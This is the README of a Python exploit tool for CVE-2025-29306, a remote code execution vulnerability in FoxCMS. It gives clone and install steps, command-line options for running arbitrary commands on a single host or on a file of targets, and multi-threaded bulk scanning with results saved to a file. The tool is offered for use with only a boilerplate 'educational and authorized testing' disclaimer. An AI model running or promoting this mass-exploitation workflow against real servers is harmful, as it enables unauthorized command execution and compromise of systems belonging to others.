A Python exploit for CVE-2025-29306, a remote code execution vulnerability in FoxCMS. This tool allows testing single targets or scanning multiple hosts in bulk.
- Single target or bulk scanning capability
- Multi-threaded for fast scanning
- Detailed output with command execution results
- Automatic results saving to file
- Real-time progress reporting
- Clean summary table of vulnerable hosts
git clone https://github.com/mattb709/CVE-2025-29306-PoC-FoxCMS-RCE
.git
cd CVE-2025-29306-PoC-FoxCMS-RCE
pip install -r requirements.txt- Python 3.6+
- Required packages:
requestsbeautifulsoup4argparse
Install requirements with:
pip install requests beautifulsoup4usage: foxcms_rce.py [-h] -c COMMAND (-t TARGET | -f TARGETS_FILE)
CVE-2025-29306 Exploit Checker
options:
-h, --help show this help message and exit
-c COMMAND, --command COMMAND
Command to execute on vulnerable hosts
-t TARGET, --target TARGET
Single target in the format ip:port
-f TARGETS_FILE, --targets-file TARGETS_FILE
File containing multiple targets, one per line, in the format ip:port
- Test a single target:
python CVE-2025-29306-PoC -t 192.168.1.100:8080 -c "whoami"- Scan multiple targets from a file:
python CVE-2025-29306-PoC -f targets.txt -c "whoami"- Save output to file (automatically done):
python CVE-2025-29306-PoC -f targets.txt -c "whoami" > results.txtThe targets file should contain one target per line in the format:
ip:port
Example:
192.168.1.100:80
10.10.10.5:443
172.16.32.15:8080
The script provides:
- Real-time progress with status for each target
- Detailed output for vulnerable hosts
- Summary table of all vulnerable hosts
- Automatic saving of full results to
foxcms_rce_results.txt
This tool is for educational and authorized testing purposes only. The author is not responsible for any misuse or damage caused by this program.
MIT License - See LICENSE file for details